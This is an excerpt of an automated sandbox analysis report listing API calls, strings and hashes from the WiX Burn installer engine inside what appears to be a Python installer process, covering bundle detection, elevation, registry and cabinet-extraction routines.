                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,004CB4A8,000000FF,?,?,?,004970FA,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 004A9171
                                                                                                                                  Strings
                                                                                                                                  • Failed to initialize update bundle., xrefs: 004A9214
                                                                                                                                  • BA aborted detect forward compatible bundle., xrefs: 004A91DB
                                                                                                                                  • comres.dll, xrefs: 004A91F3
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\detect.cpp, xrefs: 004A91D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareString
                                                                                                                                  • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$c:\agent\_work\138\s\src\burn\engine\detect.cpp$comres.dll
                                                                                                                                  • API String ID: 1825529933-2620696206
                                                                                                                                  • Opcode ID: 897498da18f8aee49a9d7e4af279b7bee20a8b4eb1ea158a73ecc00b7b6a90ee
                                                                                                                                  • Instruction ID: 725abf031e0187c89aaf82f5538c00f78420e907f43af50d88aafa9a7ec291f2
                                                                                                                                  • Opcode Fuzzy Hash: 897498da18f8aee49a9d7e4af279b7bee20a8b4eb1ea158a73ecc00b7b6a90ee
                                                                                                                                  • Instruction Fuzzy Hash: EB514931600202FFDF159F65CC85FAAB76AFF16310F10466AF9149A295C739EC60DB98
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000001,004CB4F0,?,00000001,000000FF,?,?,00000000,00000000,00000001,00000000,?,004974BE), ref: 0049D4F7
                                                                                                                                  Strings
                                                                                                                                  • Failed to create pipe name and client token., xrefs: 0049D42B
                                                                                                                                  • Failed to connect to elevated child process., xrefs: 0049D4E0
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\elevation.cpp, xrefs: 0049D3F5
                                                                                                                                  • Failed to elevate., xrefs: 0049D4D9
                                                                                                                                  • Failed to create pipe and cache pipe., xrefs: 0049D447
                                                                                                                                  • UX aborted elevation requirement., xrefs: 0049D3FF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle
                                                                                                                                  • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$c:\agent\_work\138\s\src\burn\engine\elevation.cpp
                                                                                                                                  • API String ID: 2962429428-1175272905
                                                                                                                                  • Opcode ID: 4321443df5f4cae3b633a4350e5977040e7f10d2dbdbb33008d09eef15d213a3
                                                                                                                                  • Instruction ID: a41b569abda6ac08e42367ee221d5ce4c1c47c7ce96d409b97adfe4ae59a0ba8
                                                                                                                                  • Opcode Fuzzy Hash: 4321443df5f4cae3b633a4350e5977040e7f10d2dbdbb33008d09eef15d213a3
                                                                                                                                  • Instruction Fuzzy Hash: E931EE32E45621BADF256660CC46FAE6A5D9B10734F20423BF515B6281EB7DBD0042DD
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C1436: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,004EBB7C,00000000,?,004C5BF9,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 004C144A
                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,crypt32.dll,00000000,00000001,004CB4F0,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 004C9969
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,crypt32.dll,00000000,00000001,004CB4F0,00000000,00000001,00000000,00020019), ref: 004C99A4
                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,crypt32.dll), ref: 004C99C0
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,crypt32.dll), ref: 004C99CD
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,crypt32.dll), ref: 004C99DA
                                                                                                                                    • Part of subcall function 004C1499: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,004C9956,00000001), ref: 004C14B1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$InfoOpenQuery
                                                                                                                                  • String ID: crypt32.dll
                                                                                                                                  • API String ID: 796878624-1661610138
                                                                                                                                  • Opcode ID: 35cf6aae27752cdc897c28621cc5de980c0c8b952cb83afad4f7ee5af05be82c
                                                                                                                                  • Instruction ID: 4b9e00079ab5325838d609883675174a99eafec8cfd9c452462f1123166ce5f0
                                                                                                                                  • Opcode Fuzzy Hash: 35cf6aae27752cdc897c28621cc5de980c0c8b952cb83afad4f7ee5af05be82c
                                                                                                                                  • Instruction Fuzzy Hash: DB414EBAC0022DFFCF61AF958D85EAEBA79EF04354F1541AFE90076221D3394E409A94
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 004C1A7E
                                                                                                                                  • lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 004C1AE0
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004C1AEC
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 004C1B2F
                                                                                                                                  Strings
                                                                                                                                  • BundleUpgradeCode, xrefs: 004C1A4B
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\regutil.cpp, xrefs: 004C1B57
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Value
                                                                                                                                  • String ID: BundleUpgradeCode$c:\agent\_work\138\s\src\libs\dutil\regutil.cpp
                                                                                                                                  • API String ID: 198323757-4149154654
                                                                                                                                  • Opcode ID: 71ffaf518d577d83d43107503b703b6d127a2bd510da0fd271241f7824e3a46a
                                                                                                                                  • Instruction ID: 588e9464b6c1040557d036bcbc43dc9d8a03fe654f3b7f57fa70e4fb7d266d60
                                                                                                                                  • Opcode Fuzzy Hash: 71ffaf518d577d83d43107503b703b6d127a2bd510da0fd271241f7824e3a46a
                                                                                                                                  • Instruction Fuzzy Hash: A231C576D00629AFCB11DF998C81E9EBB78EF45750F05006AFD01B7221E734ED118BA8
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0049AD19,00000001,00000000,00000000), ref: 0049D277
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,004854DE,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0049D283
                                                                                                                                    • Part of subcall function 0049CECF: WaitForSingleObject.KERNEL32(?,000493E0,00000000,?,?,0049D2F3,00000000,?,?,0049C779,?,?,?,?,?,004854DE), ref: 0049CEE1
                                                                                                                                    • Part of subcall function 0049CECF: GetLastError.KERNEL32(?,?,0049D2F3,00000000,?,?,0049C779,?,?,?,?,?,004854DE,?,?,?), ref: 0049CEEB
                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,0049C779,?,?,?,?,?,004854DE,?,?,?,?), ref: 0049D304
                                                                                                                                  Strings
                                                                                                                                  • Failed to pump messages in child process., xrefs: 0049D2DB
                                                                                                                                  • Failed to create elevated cache thread., xrefs: 0049D2B1
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\elevation.cpp, xrefs: 0049D2A7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
                                                                                                                                  • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$c:\agent\_work\138\s\src\burn\engine\elevation.cpp
                                                                                                                                  • API String ID: 3606931770-2430441278
                                                                                                                                  • Opcode ID: 5ba4c203b8d4c9cc397e53514ea512465edf91727fcda8c97b01f74b08c74802
                                                                                                                                  • Instruction ID: f13a6e0c2051a1b9dd296d6f49be8478e60ebb9e8d8cc455fca785c4e713aa13
                                                                                                                                  • Opcode Fuzzy Hash: 5ba4c203b8d4c9cc397e53514ea512465edf91727fcda8c97b01f74b08c74802
                                                                                                                                  • Instruction Fuzzy Hash: 6741C2B6D01219AF8B45DFA9D8819DEBBF4FF48710B20416BF819E7340E73499418F98
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,004859A1,00000100,00000100,00000000,?,00000001,00000000,00000100), ref: 004873F0
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,004859A1,00000100,00000100,00000000,?,00000001,00000000,00000100), ref: 004874CF
                                                                                                                                  Strings
                                                                                                                                  • Failed to get unformatted string., xrefs: 00487460
                                                                                                                                  • Failed to get variable: %ls, xrefs: 00487431
                                                                                                                                  • *****, xrefs: 0048748B, 00487498
                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 004874BE
                                                                                                                                  • Failed to format value '%ls' of variable: %ls, xrefs: 00487499
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                                                                                  • API String ID: 3168844106-2873099529
                                                                                                                                  • Opcode ID: 0d88ee4829c0fea73c658bc68b02d5c30f9e6c5103bdfd8c46e416b7116dde78
                                                                                                                                  • Instruction ID: fc3478500db1b7959cdbd808d20178e4cc2b16236693d4fdfad307c787581e04
                                                                                                                                  • Opcode Fuzzy Hash: 0d88ee4829c0fea73c658bc68b02d5c30f9e6c5103bdfd8c46e416b7116dde78
                                                                                                                                  • Instruction Fuzzy Hash: 7C31B33690461AFBCF11BB51CC15F9EBE65EF10B24F204A2BF80866190D73DEA5097D9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                  • API String ID: 0-537541572
                                                                                                                                  • Opcode ID: 887965f981a5744cffa25d8e70d00b7fe99bdbcbea5ca91fb67d32fce5f62d35
                                                                                                                                  • Instruction ID: 1da8602a5d8a079e01b84e9b7ef33dfeee69466f2e1cae6cb07c7979f9e9a788
                                                                                                                                  • Opcode Fuzzy Hash: 887965f981a5744cffa25d8e70d00b7fe99bdbcbea5ca91fb67d32fce5f62d35
                                                                                                                                  • Instruction Fuzzy Hash: 1B210831A01220ABCB31AA259C45FAB3768DF01760F250162EE55AB3A1D739ED0186F9
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,0049409C,00000001,feclient.dll,?,00000000,?,?,?,00484B92), ref: 004842D9
                                                                                                                                  • GetLastError.KERNEL32(?,?,0049409C,00000001,feclient.dll,?,00000000,?,?,?,00484B92,?,?,004CB478,?,00000001), ref: 004842E5
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,0049409C,00000001,feclient.dll,?,00000000,?,?,?,00484B92,?), ref: 00484320
                                                                                                                                  • GetLastError.KERNEL32(?,?,0049409C,00000001,feclient.dll,?,00000000,?,?,?,00484B92,?,?,004CB478,?,00000001), ref: 0048432A
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\dirutil.cpp, xrefs: 0048434E
                                                                                                                                  • crypt32.dll, xrefs: 004842A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectoryErrorLast
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\dirutil.cpp$crypt32.dll
                                                                                                                                  • API String ID: 152501406-1703428526
                                                                                                                                  • Opcode ID: 8b658993da6be635fcb8677e33ca12fc5c9e84fde726b18ab46b9cfd3023e032
                                                                                                                                  • Instruction ID: 02bbc67daa0139e8d98633c8be8220d7abe1dfa96b8c32572ad933867fada8de
                                                                                                                                  • Opcode Fuzzy Hash: 8b658993da6be635fcb8677e33ca12fc5c9e84fde726b18ab46b9cfd3023e032
                                                                                                                                  • Instruction Fuzzy Hash: E011A277A01737AB97217A994C45B5FA668AF907A1B16057BFE00E7240E728DC0087E8
                                                                                                                                  APIs
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000001,00000000), ref: 004C8CAB
                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?), ref: 004C8CBD
                                                                                                                                  Strings
                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u, xrefs: 004C8D08
                                                                                                                                  • crypt32.dll, xrefs: 004C8C7B
                                                                                                                                  • feclient.dll, xrefs: 004C8C85
                                                                                                                                  • %04hu-%02hu-%02huT%02hu:%02hu:%02huZ, xrefs: 004C8C94
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$InformationLocalSpecificSystemZone
                                                                                                                                  • String ID: %04hu-%02hu-%02huT%02hu:%02hu:%02hu%c%02u:%02u$%04hu-%02hu-%02huT%02hu:%02hu:%02huZ$crypt32.dll$feclient.dll
                                                                                                                                  • API String ID: 1772835396-1985132828
                                                                                                                                  • Opcode ID: 03992a504ed79bb5839bfcdfee7a5ad0a49434b846edc4f19bc6f1c387aae946
                                                                                                                                  • Instruction ID: 407f37510911f59d1210e1fc4e94c932041f35ca1d48efb530193fcd4ebd11ae
                                                                                                                                  • Opcode Fuzzy Hash: 03992a504ed79bb5839bfcdfee7a5ad0a49434b846edc4f19bc6f1c387aae946
                                                                                                                                  • Instruction Fuzzy Hash: 8F210CA6900118EADB60DB9ADC05FBFB3FCEB4D711F00455AB945E2180E77C9A80D774
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cabextract.cpp, xrefs: 004A0AE8
                                                                                                                                  • Failed to write during cabinet extraction., xrefs: 004A0AF2
                                                                                                                                  • Unexpected call to CabWrite()., xrefs: 004A0A7E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                  • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp
                                                                                                                                  • API String ID: 1970631241-3024265679
                                                                                                                                  • Opcode ID: 6efafb5410c16d0d953fa0109a5d3a1d3a35d1a47fa2d480ac83c9c06ceaddee
                                                                                                                                  • Instruction ID: 3096eac5fd19fcfd22012d4678c973f4bfce91dea7ae4f91c4e6a217a6a3e052
                                                                                                                                  • Opcode Fuzzy Hash: 6efafb5410c16d0d953fa0109a5d3a1d3a35d1a47fa2d480ac83c9c06ceaddee
                                                                                                                                  • Instruction Fuzzy Hash: 10212377100204EBCB00DF6DC884E5A37B9EFA5724B11005BFA04CB386D779D900CB68
                                                                                                                                  APIs
                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00489BA9
                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,0048A97A,00000100,000002C0,000002C0,00000100), ref: 00489BBE
                                                                                                                                  • GetLastError.KERNEL32(?,0048A97A,00000100,000002C0,000002C0,00000100), ref: 00489BCB
                                                                                                                                  Strings
                                                                                                                                  • Failed to format variable string., xrefs: 00489BB4
                                                                                                                                  • Failed to set variable., xrefs: 00489C30
                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00489C0B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                  • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                  • API String ID: 1811509786-402580132
                                                                                                                                  • Opcode ID: 26c43bfbc714ebc1196a40c2ed95daaa7c2018e20078c5b521e6fa08f483f211
                                                                                                                                  • Instruction ID: 99089fb0481c030e2f0ccd7f886fa455aa9e5cd86275250dfd5cd673787eae0d
                                                                                                                                  • Opcode Fuzzy Hash: 26c43bfbc714ebc1196a40c2ed95daaa7c2018e20078c5b521e6fa08f483f211
                                                                                                                                  • Instruction Fuzzy Hash: 1611EB36900925B6CB117A659D06F7E7658AF10320F254A2BFC01A6190D72E9D50A3DD
                                                                                                                                  APIs
                                                                                                                                  • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 004A0B7F
                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004A0B91
                                                                                                                                  • SetFileTime.KERNEL32(?,?,?,?), ref: 004A0BA4
                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,004A0774,?,?), ref: 004A0BB3
                                                                                                                                  Strings
                                                                                                                                  • Invalid operation for this state., xrefs: 004A0B58
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cabextract.cpp, xrefs: 004A0B4E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                  • String ID: Invalid operation for this state.$c:\agent\_work\138\s\src\burn\engine\cabextract.cpp
                                                                                                                                  • API String ID: 609741386-470522311
                                                                                                                                  • Opcode ID: b3fb75b2274c58e814266619d667888eda5dd4b2a60fb9db7d87388d1e2543a9
                                                                                                                                  • Instruction ID: 809567e5eb8390301bfcc9836ecd71a7ac8d19883a67df39efe6aae0a803c6a5
                                                                                                                                  • Opcode Fuzzy Hash: b3fb75b2274c58e814266619d667888eda5dd4b2a60fb9db7d87388d1e2543a9
                                                                                                                                  • Instruction Fuzzy Hash: A421C672800219AB87509FA9CD099EE7BACFE15714B504257F860D66D0D778EA11CBE8
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 00496B33
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00496BA3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateFileHandle
                                                                                                                                  • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                                                                                                  • API String ID: 3498533004-3263533295
                                                                                                                                  • Opcode ID: 558150e6e1ea05ad8b34cf7ab3df0a4702c918fcf0c89e0a02b9b9dd71c6705d
                                                                                                                                  • Instruction ID: 434f440834bec089ccba1c6a26def950687d3439e3c7fcba7881ff74a7038347
                                                                                                                                  • Opcode Fuzzy Hash: 558150e6e1ea05ad8b34cf7ab3df0a4702c918fcf0c89e0a02b9b9dd71c6705d
                                                                                                                                  • Instruction Fuzzy Hash: D311E631A40724BBCF116E598C46F5F3EA89B41B34F114227F925E72D1E77895118798
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004B89A2: _free.LIBCMT ref: 004B89C7
                                                                                                                                  • _free.LIBCMT ref: 004B8A28
                                                                                                                                    • Part of subcall function 004B604F: HeapFree.KERNEL32(00000000,00000000,?,004B89CC,?,00000000,?,00000000,?,004B89F3,?,00000007,?,?,004B8E6D,?), ref: 004B6065
                                                                                                                                    • Part of subcall function 004B604F: GetLastError.KERNEL32(?,?,004B89CC,?,00000000,?,00000000,?,004B89F3,?,00000007,?,?,004B8E6D,?,?), ref: 004B6077
                                                                                                                                  • _free.LIBCMT ref: 004B8A33
                                                                                                                                  • _free.LIBCMT ref: 004B8A3E
